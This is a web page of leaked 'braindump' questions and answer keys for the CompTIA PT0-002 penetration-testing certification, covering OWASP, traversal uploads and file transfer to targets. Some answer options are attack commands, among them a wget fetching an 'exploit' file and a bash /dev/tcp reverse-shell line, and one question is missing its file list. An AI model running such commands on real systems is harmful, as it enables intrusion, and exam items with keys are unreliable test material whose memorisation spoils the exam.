CompTIA
Checkpoint
ISC
HP
Dell
EC-Council
EXIN
Fortinet
ITIL®
Juniper
PMI
Microsoft
VMware
Avaya
Google
Salesforce
Amazon
Palo Alto Networks
Certiport
ISC2
All Vendors
  2. Home
  3. Exams
  4. CompTIA
  5. PT0-002

Free PT0-002 Exam Braindumps (page: 3)

Page 2 of 93
PDF with 485 Questions

Which of the following BEST describe the OWASP Top 10? (Choose two.)

  1. The most critical risks of web applications
  2. A list of all the risks of web applications
  3. The risks defined in order of importance
  4. A web-application security standard
  5. A risk-governance and compliance framework
  6. A checklist of Apache vulnerabilities

Answer(s): A,C


Reference:

https://www.synopsys.com/glossary/what-is-owasp-top-10.html



A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are:



Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

  1. Edit the discovered file with one line of code for remote callback.
  2. Download .pl files and look for usernames and passwords.
  3. Edit the smb.conf file and upload it to the server.
  4. Download the smb.conf file and look at configurations.

Answer(s): C



A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?

  1. Whether sensitive client data is publicly accessible
  2. Whether the connection between the cloud and the client is secure
  3. Whether the client's employees are trained properly to use the platform
  4. Whether the cloud applications were developed using a secure SDLC

Answer(s): A



A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

  1. nc 10.10.51.50 9891 < exploit
  2. powershell -exec bypass -f \\10.10.51.50\9891
  3. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
  4. wget 10.10.51.50:9891/exploit

Answer(s): D






Post your Comments and Discuss CompTIA PT0-002 exam with other Community members:

PT0-002 Discussions & Posts